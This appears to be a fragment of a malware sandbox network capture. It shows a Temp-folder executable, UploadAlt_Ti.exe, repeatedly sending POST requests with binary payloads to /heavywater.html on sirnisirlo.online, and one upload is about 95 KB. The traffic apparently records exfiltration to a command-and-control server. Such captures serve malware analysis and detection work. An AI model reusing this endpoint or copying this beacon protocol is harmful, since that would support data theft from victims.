92 d6 b4 fc dc 96 b0 94 dc e8 96 ea dc e8 7c ec Data Ascii: hprjr\|~\|trrrr~\|\|r\|rjN~hjF\|Nj\|rr~F~h~\|tpNzFhjrFjxrFrht\|\|\|
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: 86 90 de ba be 90 b0 82 ba d4 f2 9e 84 dc 8e 80 9a a8 ba a8 4e 86 82 8a 94 ca 8c d0 c8 d4 c8 bc 70 fa 8e c6 82 78 bc b4 be c2 9a b6 ca 84 c0 78 f6 90 90 86 d4 8a 68 70 82 7c bc b4 9c ba 8c d2 90 9e aa ac b6 ec ea d6 ca f0 8e be ce ac d0 9a ba b8 ca c6 74 da b0 c4 92 be 8a c8 f0 d2 a8 d6 f4 c2 9c da 74 d6 fc f0 72 9c 84 70 ca d4 90 d2 70 bc fa ce de 7a 9c f0 70 9a de f8 b0 b2 de 9a 7e 82 84 f6 9e aa c4 dc 8a c4 c2 92 8a 82 c8 ba 76 dc 8e 82 96 9c 9e ca f8 88 8c 92 94 86 96 ac d6 da c4 cc fa 82 c0 96 84 de 94 f2 d6 9a cc b6 ea dc de 82 9c a8 7e ce b4 46 9e 74 c2 de cc ce 8c c4 d6 7a 78 b0 9c da 9c 8a b4 e8 46 c2 96 9c d0 7a fa 9c de fe 8c e8 de b8 d6 82 80 c6 f8 94 b4 9a c6 68 72 fe c8 b2 96 b6 f6 a8 a8 90 6a aa 96 b0 fc 86 92 ea 9a 92 b6 ba 70 b6 80 9a ca Data Ascii: Npxxhp\|ttrppzp~v~FtzxFzhrjp
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: 72 84 b0 cc ec ec be b8 6a 74 4e 4e 82 fa b0 9a ac 74 de f2 a8 90 8c c0 dc fe f0 f0 a8 ac b8 c8 c6 92 f4 80 a8 82 b8 8c cc 82 c2 90 9a 7c 8e 7e fc 86 ba 9a d2 c2 f8 78 d2 72 82 88 8a f4 ca fe 9a fa b0 fe b6 ac c8 7a c0 46 70 ea 7e fa b8 f2 9e 7c 7e b6 7c 7a 74 be e8 d0 d6 ec c4 d4 86 90 84 4e e8 fa cc 46 d2 74 8e 68 d4 96 b6 74 92 b0 d0 ea d6 b8 9c ec ac 84 d0 f4 90 76 f8 c6 e8 b8 b4 7c 84 46 b2 ec b0 b4 8a 7c 92 46 b2 ec cc cc 88 88 c8 4e 8c 92 cc 76 fa b8 82 be c0 80 7a ce d0 aa ac 70 7e cc fe d6 ca 92 ec f2 b8 ba b4 b8 9a aa 78 aa ba b6 b8 bc ac d2 4e d6 c8 d4 9c 94 76 86 9e e8 68 9e b2 76 68 dc fe 8c b4 f8 c2 e8 76 90 92 bc b4 7c 8e e8 f4 c0 f4 c4 e8 ce b6 9a cc ea e8 d4 86 b0 e8 82 78 74 72 7c 94 f8 f8 ce 7e c6 ba 72 f4 b8 be 76 c0 76 8a b6 f4 fc d0 Data Ascii: rjtNNt\|~xrzFp~\|~\|ztNFthtv\|F\|FNvzp~xNvhvhv\|xtr\|~rvv
2024-11-14 18:57:54 UTC	724	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:54 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wl1Bwux507bwRaaKL331FAkCzozpcknu6LhR%2B64Y2XyaTNqfF9jzJxIu%2BOVJOXnm1d%2FQYe5UzsK6EwbxbZzqgztsBlS8HniBn%2BD%2BJna%2FWzQy%2Bq%2B9n4o48yxrYNi94Ixpk8zGYA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293ad4280d642c-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=42356&sent=254&recv=724&lost=0&retrans=0&sent_bytes=2842&recv_bytes=684450&delivery_rate=68311&cwnd=32&unsent_bytes=0&cid=397cf111ed81fe65&ts=1182&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	58014	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:55 UTC	418	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 745 Host: sirnisirlo.online
2024-11-14 18:57:55 UTC	745	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 5d e2 73 3d 95 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c a2 dd fe 62 1e 18 18 18 18 18 18 18 18 18 18 18 3d 99 39 a2 dd fe 62 dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 18 18 18 18 18 18 18 42 18 42 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 16 18 18 18 18 18 18 18 18 18 18 18 18 1a 18 18 18 b8 8e 12 14 18 18 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 17 e9 98 1f a7 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c 36 cb 29 26 32 18 18 18 18 18 18 18 18 18 18 18 3d 99 3d 33 99 1c 1a 5f 3d 99 18 59 33 99 1a 1a 5f 3d 99 18 59 36 cb Data Ascii: ]s=r;z<b=9b@BBr;z<6)&2==3_=Y3_=Y6
2024-11-14 18:57:55 UTC	707	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:55 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehP5GfeB4I1GEyah3OUv7eUhirr4MH8qKyZq2lQJawlZuo2WAjiap81yOew0BvfFtwE35vJAQokdDcrsFONJjVkPCQUMXGxD9%2BoFmcntLSND%2FU4feYhFiQy8ZCAqGwGllc%2B8tg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293adfff466444-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=39724&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1799&delivery_rate=73090&cwnd=32&unsent_bytes=0&cid=368deb9f535b4feb&ts=504&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	58015	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:56 UTC	418	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 212 Host: sirnisirlo.online
2024-11-14 18:57:56 UTC	212	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 a7 1a cc 30 99 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c 57 2c 81 78 16 18 18 18 18 18 18 18 18 18 18 18 3f 99 99 3d 99 3b 18 57 2c 81 78 dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 18 18 18 18 18 18 18 42 18 42 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 16 18 18 18 18 18 18 18 18 18 18 18 18 1a 18 18 18 b8 8e 12 14 18 18 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: 0r;z<W,x?=;W,x@BB
2024-11-14 18:57:57 UTC	707	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:56 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCdFl6TC7%2FjDDC%2Fol1dBRF7cBAY9f7R7FVWc1D0f67XLDLi9sv8ShgvSA2xArm7snpVqaot3EdlXfcMrcMaZDQAuUcXwihqgXR7lYra610FC7ua3KmI7qDv68Jh%2BdGm25IH7iQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293ae7c8f31828-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=39334&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1266&delivery_rate=73543&cwnd=32&unsent_bytes=0&cid=30208d1578dbdfcd&ts=512&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	58016	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:57 UTC	418	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 380 Host: sirnisirlo.online
2024-11-14 18:57:57 UTC	380	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 a9 c5 15 39 95 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c 4b 93 32 6a 1e 18 18 18 18 18 18 18 18 18 18 18 3d 99 39 4b 93 32 6a dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 18 18 18 18 18 18 18 42 18 42 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 16 18 18 18 18 18 18 18 18 18 18 18 18 1a 18 18 18 b8 8e 12 14 18 18 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 3d 11 46 35 94 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c 62 3a 94 72 1c 18 18 18 18 18 18 18 18 18 18 18 3b 39 62 3a 94 72 dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 Data Ascii: 9r;z<K2j=9K2j@BB=F5r;z<b:r;9b:r@
2024-11-14 18:57:58 UTC	719	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:58 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r5%2BHO4AB74SpZEHU04MifhPEIX90t18OlT%2BalCG0gEaBe96ohN%2BLgOpchCH%2BYiCS5fWsxgM%2BdEL3fbA36TqH%2FyzDJNStXlT%2FLRbb4WBmZLg%2Bp1%2BgcPxk37aSsa7AVybOIomefA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293af169e72574-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=38438&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1434&delivery_rate=75279&cwnd=32&unsent_bytes=0&cid=4263aea8067ecbfb&ts=521&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	58017	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:59 UTC	417	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 35 Host: sirnisirlo.online
2024-11-14 18:57:59 UTC	35	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:58:00 UTC	708	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:00 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge7uDAZFkth7YFF%2Bo8ZuouUH41tV7kfRfZsC7MBqjob4SJohc6x0fK0yk14xJnSFfAeJckoaNOusPA4YPbdFpzeUqt4DrzAnx4W3JRRJ63ScyQNXa%2BgYZQUH7CAfTsvD%2FNniUw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293afb1dfed763-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=134742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1088&delivery_rate=21488&cwnd=32&unsent_bytes=0&cid=ee953bad957bfa37&ts=796&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	58018	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:01 UTC	420	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 95675 Host: sirnisirlo.online
2024-11-14 18:58:01 UTC	15331	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 69 89 19 2b 80 75 01 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c ca 0b 2a 4e 72 06 18 18 18 18 18 18 18 18 18 18 2f 99 55 7c 7a 74 68 74 72 55 c8 f2 dc d2 fc f0 3f 0c 18 83 8c d2 3b 3d 83 12 18 83 10 18 87 18 18 18 1a e7 f1 18 18 ab 54 8a c4 f0 d2 c0 48 bc 4a 58 9e c6 fc d2 48 b0 82 4a 7c 58 9e b8 b2 58 74 74 78 78 58 98 58 7c 44 70 78 58 96 88 ec 3b 67 82 ca de fc c6 fe c6 d4 f0 58 9c da fe ca de 58 90 ca fe f8 c0 da ea 58 9a d0 da f8 f0 d2 fc 99 9f a1 18 93 59 55 be ea fe f0 d2 c2 49 bc d2 d6 ca fe f0 fc ea 49 fe c2 fe fe 44 d2 e8 d2 4b de fe fc fe fe 44 d2 e8 d2 4f f6 ca c4 ca c4 ca f0 44 d2 e8 d2 4b de fe fc fe fe 44 d2 e8 d2 41 f6 ca c4 c0 c6 d6 c6 c4 44 d2 e8 d2 41 fe d2 fc f4 ca de d2 Data Ascii: i+ur;z<*Nr/U\|zthtrU?;=THJXHJ\|XXttxxXX\|DpxX;gXXXYUIIDKDODKDADA
2024-11-14 18:58:01 UTC	15331	OUT	Data Raw: da e3 65 25 76 b5 e4 e3 f8 84 96 a4 17 bd 37 7d 51 23 ee 96 bb 6d eb 18 65 d2 ae 63 20 20 df f6 f9 5f ce dd ef db 6e 2b 3b 3d bc 9b 16 33 0e 2a b0 99 59 70 73 42 07 a0 bc a4 69 fc da f2 33 9e 80 48 34 e4 53 52 bc 5b c8 4b 7f b4 92 33 54 9d 93 d0 bf a1 22 b4 bf 6f 5e d9 c9 04 0d fe d5 e2 dc e2 27 11 6f 41 5c c1 e8 3b 33 5b 9b 27 e6 b9 fe c3 95 b2 4c f9 9d d2 46 2d e9 52 8f 8a c6 60 5f b3 94 d4 64 c9 9c 99 95 88 72 4e 45 ca be cc 31 0c 00 57 dc 36 a0 40 d5 f0 01 39 c2 d8 db 21 14 8d a0 77 9d 4c 71 f9 fb 41 61 5e b7 5f fd 5b 32 7b 61 4e 2c 58 d0 ae 98 ae 86 86 88 60 04 80 ce a7 41 61 4a 1f 9b c5 41 d6 f2 76 e0 a9 7e 52 37 e7 e0 5a 62 3d 3b 9a 40 4d 0e bb 3f 8f 6b b1 46 5e 21 97 79 aa ec ea 62 eb 68 2d bf e9 d1 ea a5 b4 cb 3f 4c 4c 38 b7 0b 51 1c 53 a0 35 56 Data Ascii: e%v7}Q#mec _n+;=3*YpsBi3H4SR[K3T"o^'oA\;3['LF-R`_drNE1W6@9!wLqAa^_[2{aN,X`AaJAv~R7Zb=;@M?kF^!ybh-?LL8QS5V
2024-11-14 18:58:01 UTC	15331	OUT	Data Raw: 90 e0 ab 52 02 ac 3d b8 b2 9e 3f c4 51 c3 d1 15 ff d2 19 e1 b8 7e 68 2f cc 7c 90 9c 77 82 08 00 94 c8 5f 55 fa 4c 57 8d 1a d8 00 48 52 87 14 57 c3 33 8e cf 2c df f8 45 57 1a 9d 3b 22 ab d6 22 c4 22 df 36 49 69 a8 85 c0 07 b0 17 f0 40 55 4d 23 d8 29 23 33 6f 5a fd 80 65 59 0b 1b 5c e3 35 23 df e0 53 01 1d b4 6f b0 28 22 de d0 67 4e 85 f7 37 26 0d ff 75 90 72 fa 54 b3 7d 77 c6 eb 69 d9 5b 03 ce 73 f2 9d 90 6d 15 18 26 53 34 a0 55 d5 d7 07 fd c7 46 bf 90 7f 67 d9 31 5b d9 4f ee 49 19 92 ad 88 8d 85 93 9f 65 c4 80 4e 3f ac 2f 10 de 51 64 9e 1f 81 df 5e 30 3f ad 93 88 0d 97 a8 58 f0 ad 02 9d 6c 2e 62 18 6d 36 23 aa 25 76 a0 9b a5 05 eb da c3 15 6a 96 ad 2b 0f 05 d9 1a 67 d6 ca 3e 74 fb f5 bf 43 85 e4 4f b0 e5 9d 3f b1 9b 0f 57 8a b2 3a 44 d5 a6 b5 cd c3 bf 71 Data Ascii: R=?Q~h/\|w_ULWHRW3,EW;"""6Ii@UM#)#3oZeY\5#So("gN7&urT}wi[sm&S4UFg1[OIeN?/Qd^0?Xl.bm6#%vj+g>tCO?W:Dq
2024-11-14 18:58:01 UTC	15331	OUT	Data Raw: e4 d9 72 83 77 c5 cd 64 90 bd 7d 8c a8 b7 2b 70 32 5c c3 5a 04 3d a3 57 fc 1b 38 07 6f e2 f3 2c 31 f4 26 d2 17 be 73 ed 6b 96 cd f5 83 53 b2 96 67 e6 28 26 ab 86 9e cd 3c da cc eb 80 2c 86 e2 00 73 8e 00 7f b4 fa 76 db 31 59 1c 6d b0 59 bd 13 0c d0 57 e4 d6 68 25 44 17 ad b8 1b 4e 37 48 7e b0 d8 1b e5 e2 8a 3f b7 b7 8d e1 43 63 52 b7 92 50 a7 60 8c ad fc 62 67 56 06 fa 89 0b d2 3d 77 15 d4 dd 8b a9 ae 01 6b 0a 06 6d 44 d4 30 d1 53 2c d3 d4 6c f8 0b 7c 55 2e e9 be 1b 48 eb dc c9 39 c3 af a1 10 2a 48 fb 77 f2 4d 9f eb ef e0 54 fc 89 04 2a 5d 5d 9f 5f ef 37 70 1e f0 58 c1 7d 6e 90 5d 11 21 64 c1 40 ab 6c ef 43 e8 d8 88 c0 80 fe 7c f6 58 70 9e 6b 16 9a c7 57 1e 9c 2d 92 71 e5 8f 5d e5 ce 57 f5 76 8b e5 e6 c4 c0 4c 58 50 00 d9 e7 6e 74 69 a9 e6 52 dd 86 e6 91 Data Ascii: rwd}+p2\Z=W8o,1&skSg(&<,sv1YmYWh%DN7H~?CcRP`bgV=wkmD0S,l\|U.H9HwMT]]_7pX}n]!d@lC\|XpkW-q]WvLXPntiR
2024-11-14 18:58:01 UTC	15331	OUT	Data Raw: d3 91 da 82 7c 03 d1 3f 0c c4 8a b3 33 66 02 a1 44 62 cc 54 7d 19 7d a1 e0 94 96 5b 5a 0e 00 08 3f d6 47 ec 71 53 ee ee c2 a0 07 13 1d cc 6a bb 8f 5e 5a d7 69 fa 4d d1 b7 0b 24 5d 58 b1 00 71 a2 b1 5d e7 2d f1 d2 4c 78 81 98 7a e1 17 4b 4a 37 f2 5d 17 0c 29 fb 3c 8c 66 e2 f6 68 34 85 11 c7 72 a1 3d 0f b7 ce 9c 25 89 2a ae 42 f0 a8 33 8e a3 9a 69 a8 c4 38 26 d4 c9 08 2f 59 b9 ce 8f 2d d2 d3 37 f5 ef 48 b8 60 38 e9 d8 c0 1e 5b 5b e0 dd f8 a6 d4 aa 3f 89 5f 88 12 68 33 7e 11 c6 14 1d b8 c1 f5 2f 6b 2b 6c 39 6b a9 c3 c0 5c 77 e4 d8 14 90 05 81 0f 16 f9 25 b9 d6 d9 04 8f 92 b2 03 a0 23 8f 62 d7 ae d6 c4 83 b9 e6 39 dd 6b 9a 12 39 c7 be 67 2b 44 90 8c 4d 67 e7 ec d7 d7 81 73 8f 76 dc 02 6a 23 2c c2 99 5e f3 b6 12 d4 ca 7f ab 4c d8 45 15 42 e3 93 44 c9 bc 2f 2b Data Ascii: \|?3fDbT}}[Z?GqSj^ZiM$]Xq]-LxzKJ7])<fh4r=%*B3i8&/Y-7H`8[[?_h3~/k+l9k\w%#b9k9g+DMgsvj#,^LEBD/+
2024-11-14 18:58:01 UTC	15331	OUT	Data Raw: 50 d1 56 05 92 ee 26 4a cf 35 43 86 39 c9 9d 8f c1 62 27 02 93 69 f8 2f 03 cc ad 69 bb 8d 67 fb 1d a9 ac 61 01 c0 42 2f 0a 84 e3 89 bd 23 93 74 36 d7 05 42 ec 68 6a eb de 3d 70 35 61 64 bd e2 7e ff a0 89 71 40 de 50 17 39 73 01 a3 46 99 ae aa b3 50 e5 97 89 f6 f7 2f d7 6c 15 9a 6e 32 b2 ed 98 69 90 81 44 81 73 ff 35 ae 7d d0 35 8f 57 c3 21 41 e0 73 68 1f 53 bb 9b 3b 73 9e 4c 58 39 28 1b 0c 72 ac f6 84 25 6c 2c f0 90 87 d9 e1 9e 33 3f e4 2f 2d 63 2b 7f e2 10 f9 b3 4f 9f 52 64 0a 9d 67 b8 45 ee 81 70 b2 52 c2 73 b1 14 76 3b f2 fc 7f 84 bc c3 a4 62 d3 fa 25 3b 68 ee ab 84 86 98 01 25 0f b5 f7 36 ff 13 91 07 67 af 33 d6 be 7b 3f b9 8b 07 4d b0 98 9b 15 0c 70 9d 71 a3 e0 6c 78 25 72 50 a2 9b 00 f3 bb 39 db df 73 1f f1 1b 4d 8e 40 95 cd b3 4b bf e3 ed 8a d1 9e Data Ascii: PV&J5C9b'i/igaB/#t6Bhj=p5ad~q@P9sFP/ln2iDs5}5W!AshS;sLX9(r%l,3?/-c+ORdgEpRsv;b%;h%6g3{?Mpqlx%rP9sM@K
2024-11-14 18:58:01 UTC	3689	OUT	Data Raw: bf 80 79 c5 d6 f7 5a 57 de 02 4b 93 b7 15 cf 7f c2 a7 4f 01 6a d6 9f bf a1 62 8f 0f 4d ed 09 a0 c5 b7 37 01 b1 46 c8 64 23 57 b2 99 e2 22 79 8f bd 42 26 40 66 27 da 50 be 65 dc da b6 bb b6 65 e9 d0 b1 cb 41 7d 1f f9 0d 8e ed 02 2d 7d 58 37 ec 76 62 a2 62 d8 9c e0 9e bd 9c 97 de dd 95 d8 cd a1 f1 22 5b 96 6c 67 bf e4 97 20 92 6d 97 b7 d6 7d fc 3f 7b 83 55 bf 8d e6 dc e5 31 c5 ce 8c cb e3 aa 6f ff c3 88 e8 f1 d5 55 36 b5 af 85 72 d5 4a cc 35 57 ee ea ad 6a 0f 42 54 c9 6b 71 0f 43 58 64 72 58 cc f8 79 e1 45 4d 46 fe 37 e8 cf 3f 46 87 4f 21 26 13 8c b8 b4 d6 2a 69 c3 6e 22 c1 cf 4d df 17 90 01 7e 03 4d 9d a5 d1 61 41 1a 17 33 b2 16 f7 a4 0a 85 7c de 0c 46 38 6a 37 70 7a d7 46 27 a6 dd 31 2e 87 68 d3 ec bf 43 63 c3 3a 6e f6 e9 aa 77 fe 0c 5b d5 94 aa 2e 1c 06 Data Ascii: yZWKOjbM7Fd#W"yB&@f'PeeA}-}X7vbb"[lg m}?{U1oU6rJ5WjBTkqCXdrXyEMF7?FO!&*in"M~MaA3\|F8j7pzF'1.hCc:nw[.
2024-11-14 18:58:01 UTC	709	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:01 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vLbhLAkX%2BBBRcALlug3TqrZxImc2b92eTXYzDKYiAeTwEj9UTJ%2FZn3lE8rNiRV46E4vCwLplv1tzON8W9yYQoHnYvdbL1K0GTubYBwzRZTm9d8AaPCmpqnQZUSgQgqXLdHJwgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293b058f54645f-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=40886&sent=40&recv=102&lost=0&retrans=0&sent_bytes=2841&recv_bytes=96995&delivery_rate=70857&cwnd=32&unsent_bytes=0&cid=01942411bc955054&ts=667&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	58019	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:02 UTC	417	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 35 Host: sirnisirlo.online
2024-11-14 18:58:02 UTC	35	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:58:03 UTC	706	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:03 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLHq43Q5LayIinJfaNaiFv4bzPerQrtklRVkneq1k1xDdcLFwmYbvIF0sTv4rxz9laRgkJjJQdZK%2FzzYeJwIGV6yvL9vWUdTP4%2B9BMloXjI90HzKcherh0U896fSYHySBbr92g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293b0fafebd758-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=131319&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1088&delivery_rate=22039&cwnd=32&unsent_bytes=0&cid=c676e76865c4115d&ts=567&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	58020	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
